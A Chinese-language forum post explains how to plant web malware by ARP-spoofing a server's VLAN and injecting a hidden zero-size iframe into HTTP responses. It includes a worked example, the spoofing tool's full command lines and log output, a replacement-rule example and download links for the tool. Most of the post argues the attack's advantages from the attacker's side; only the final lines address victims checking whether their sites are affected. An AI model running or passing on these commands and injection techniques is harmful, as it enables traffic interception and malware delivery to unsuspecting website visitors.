|
ld上有不少网友中了此招,之前已经有人说arp,对没错就是卡巴都无能为力的arp欺骗
原理:
目的:通过arp欺骗来直接挂马
对服务器其下网站插入类似:
<iframe src=http://www.***.com/*.htm width=0 height=0></iframe>
优点:可以直接通过arp欺骗来挂马.
通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码,或者结合ssh中间人攻击来监听ssh1的密码
但这样存在局限性:
1.管理员经常不登陆,那么要很久才能监听到密码
2.目标主机只开放了80端口,和一个管理端口,且80上只有静态页面,那么很难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码.
优点:1.可以不用获得目标主机的权限就可以直接在上面挂马
2.非常隐蔽,不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句.
3.可以最大化的利用arp欺骗,从而只要获取一台同一vlan下主机的控制权,就可以最大化战果.
原理:arp中间人攻击,实际上相当于做了一次代理。
正常时候: a---->b ,a是访问的正常客户,b是要攻击的服务器,c是被我们控制的主机
arp中间人攻击时候: a---->c---->b
b---->c---->a
实际上,c在这里做了一次代理的作用
那么http请求发过来的时候,c判断下是哪个客户端发过来的包,转发给b,然后b返回http响应的时候,在http响应包中,插入一段挂马的代码,比如 <iframe>...之类,再将修改过的包返回的正常的客户a,就起到了一个挂马的作用.在这个过程中,b是没有任何感觉的,直接攻击的是正常的客户a,如果a是管理员或者是目标单位,就直接挂上马了.
实例:
欺骗192.168.0.108访问百度网站的全过程
效果: 192.168.0.108看到的百度首页只有一句话“hack by cooldiyer”,攻击成功。
图解:
__________________________________________________________________________________
f:\arpspoof\release>arpspoof /n
arpspoof 3.1b by cooldiyer 06-10-30
[+] replace job file job.txt release success... # 利用程序自动生成的规则文件,就能搞定
f:\arpspoof\release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt
arpspoof 3.1b by cooldiyer 06-10-30
parsing rul <hea ==> hack by cooldiyer<noframes> # 程序加载文件job.txt中的规则,可用arpspoof /n生成模板
parsing rul <hea ==> hack by cooldiyer<noframes>
[+] loaded 2 rules... # 共加载了两条规则,如果文件格式不对,程序在这里会中断
spoofing 192.168.0.1 <-> 192.168.0.108 # 开始arpspoof欺骗,监视转发的数据包
[+] caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一个需要转发的数据包,但没找到要替换的字符串
forwarding untouched packet of size 62 # 所以直接转发出去,以下几个也是
[+] caught 202.108.22.43:80 -> 192.168.0.108:4304 # ............
forwarding untouched packet of size 62
[+] caught 192.168.0.108:4304 -> 202.108.22.43:80
forwarding untouched packet of size 60
[+] caught 192.168.0.108:4304 -> 202.108.22.43:80
forwarding untouched packet of size 399
[+] caught 202.108.22.43:80 -> 192.168.0.108:4304
forwarding untouched packet of size 60
[+] caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一个需要转发的数据包,找到了要替换的内容,应用规则。
applying rul <hea ==> hack by cooldiyer<noframes> # 把“<hea”替换成了“hack by cooldiyer<noframes>”
done 1 replacements, forwarding packet of size 1474 # 给出提示这个数据包被替换了多少次,替换后包的大小 (调试用的)
[+] caught 202.108.22.43:80 -> 192.168.0.108:4304
forwarding untouched packet of size 1474
[+] caught 192.168.0.108:4304 -> 202.108.22.43:80
forwarding untouched packet of size 60
[+] caught 202.108.22.43:80 -> 192.168.0.108:4304
forwarding untouched packet of size 237
[+] caught 192.168.0.108:4304 -> 202.108.22.43:80
forwarding untouched packet of size 60
[+] reseting ..... # ctrl+c,程序自动恢复受骗主机的arp缓存
[-] sleep 5s ............ # 5秒退出
__________________________________________________________________________________
其它说明:
arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log
可保存数据到文件,
arpspoof 192.168.0.1 192.168.0.108 80 2 1
只显示数据
被替换的字符串要尽可能的短,这样能减少程序负担,可参考arpspoof /n生成的规则文件job.txt[/*][/*]
相关文件下载
http://201314.free.fr/attachments/200612/arpspoof.3.1.zip
辅助工具下载:查找同服务器下有多少网站的工具
http://soft.xishui.net/down/base/domain.exe
作用:如果中招,通过此工具查找出你同服务器下其它网站,看是不是都被挂<iframe ..> 了
没错,你同一个服务器下其它网站都被挂了,那ok,去叼你空间商去,叫他们提高网络安全意识,把arp欺骗干掉,至此问题解决。 |
|